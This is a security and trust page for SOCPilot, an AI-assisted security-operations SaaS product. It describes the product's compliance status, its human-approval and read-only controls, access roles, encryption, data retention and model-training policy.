Security · verified

SOC 2 Type II compliant. ISO 27001 in progress.

Audit completed January 2026 covering the SOCPilot SaaS multi-tenant production environment. Stage 2 ISO 27001 audit scheduled August 2026. Annual penetration test conducted by Kestrel Cyber in November 2025.

Compliance posture
  • SOC 2 Type II compliant
    Audit completed January 2026. Scope: SOCPilot SaaS multi-tenant production environment.
  • ISO 27001 — in progress
    Stage 2 audit scheduled August 2026.
  • Penetration test
    Annual test conducted by Kestrel Cyber, November 2025.
Read-only
MFA required
Kill switch
Authority boundaries

What SOCPilot does automatically. What requires a human.

Control 01
Human approval for high-impact actions

SOCPilot automates investigation. Humans authorize impact.

  • Automatic: entity correlation, timeline sequencing, evidence collection, brief generation.
  • Human approval required: escalating to Critical status.
  • Human approval required: updating downstream tickets in Jira / ServiceNow.
  • Human approval required: final case closure.
Control 02
Read-only defaults

Every integration begins read-only.

  • Write scopes require Tenant Admin opt-in per integration.
  • Mode is auditable and reversible.
Control 03
Immutable audit logs

Every Approve / Reject / Edit action recorded.

  • Retained 180 days.
  • Per-actor and per-role attribution.
  • Exportable for auditor review.
Control 04
Least-privilege integrations

Each connector documents and minimizes scope.

  • Per-connector permission manifest.
  • Rotatable, encrypted credentials.
  • One-click revoke at the source system.
Control 05
Evidence-linked reasoning

Every recommendation cites the log line it relied on.

  • No black-box verdicts.
  • Per-signal confidence weights.
  • AI outputs are drafts until a human approves.
Control 06
Role-based access control

Five roles, enforced at the database.

  • Platform Admin, Tenant Admin, Security Engineer.
  • SOC Analyst (Read / Edit).
  • Executive (Read-only).
  • SAML 2.0 and OIDC supported.
  • MFA mandatory for Admin and Engineer roles.
Cryptography & infrastructure

Verified controls.

TLS 1.3 in transit
AES-256 at rest via AWS KMS
US-East-1 default residency · EU-Central-1 for EMEA
Subprocessors: AWS, Pinecone, Anthropic (private API)
Data retention

Windows are explicit and enforced.

Raw telemetry
30 days
Investigation narratives
90 days
Executive briefs & compliance packs
365 days
Deletion
Automated hard delete at retention expiry; manual purge available via API
AI / model policy

Contextual enrichment only, unless a Tenant Admin opts in.

By default, customer telemetry is used for contextual enrichment only and is not used to train underlying LLM/ML models. Training use is opt-in only and requires the Tenant Admin to enable Global Intelligence.
Trust Center

Need our SOC 2 Type II report, DPA, or pen-test summary?

Documents available under NDA. Same-business-day response on security requests.

Request documentation

SOC 2 Type II, DPA, pen-test, subprocessors.

Or report a vulnerability — we run a coordinated disclosure program.

Security inquiry
Request SOC 2 letter, DPA, pen-test summary, or report a vulnerability.
We respond within one business day. No newsletter spam.

For active vulnerability disclosure, also email security@socpilot.co with details.